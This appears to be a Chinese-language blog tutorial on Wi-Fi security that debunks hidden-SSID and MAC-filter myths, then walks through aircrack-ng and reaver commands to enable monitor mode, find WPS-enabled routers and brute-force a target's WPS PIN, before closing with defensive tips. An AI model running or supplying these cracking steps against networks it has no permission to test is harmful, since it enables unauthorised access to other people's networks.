wifi安全研究

常见的关于wifi安全的误区:

  • 隐藏wifi网络,其他人就搜不到了。 这是不对的,隐藏只是不发送SSID的广播了,但是通过无线扫描,仍然能扫到。

  • 使用无线网络连接的黑名单,可以不让指定mac连接。 并不能,只要有人想黑你的wifi,它是可以伪造mac地址的。所以,无论黑名单和白名单都无用。

今天我们就来研究下wifi安全吧:

安装所需包

sudo apt-get install aircrack-ng reaver

创建虚拟接口

先查看下本地无线网卡:

iwconfig

启动无线网卡的监听模式:

sudo airmon-ng check kill
sudo airmon-ng start wlan1

可能会出现如下错误


wlan0        Unknown     brcmfmac_sdio - [phy0]mon0: ERROR while getting interface flags: No such device

                (monitor mode enabled on mon0)

当你看到上面的错误,说明你的网卡不支持监听模式,包括树莓派3的网卡也是不支持监听模式的,详见:

树莓派3无线网卡启动监听模式失败

扫描查看附近热点

查看附近所有wifi信号

sudo airodump-ng mon0

查看支持WPS的wifi信号

sudo wash -i mon0 -C

暴力破解PIN码

reaver -i mon0 -b 目标路由的mac地址 -vv -a
#可选参数
#设置PIN破解间隔
# -d 3

怎么防止wifi被破解

其实防止wifi破解很简单,只要做好以下几点就可以:

  • 足够复杂的密码,长度在10位以上而且包含字母数字和特殊符合,并且无任何意义。
  • 不要在自己的手机上装WIFI破解类软件,若使用他们连接wifi,会被记录wifi密码,wifi名称和地理位置。
  • 选用支持访客模式的路由,方便给朋友之类的使用,不用时关闭。
  • 不要选用支持WPS之类一键登录的无线路由。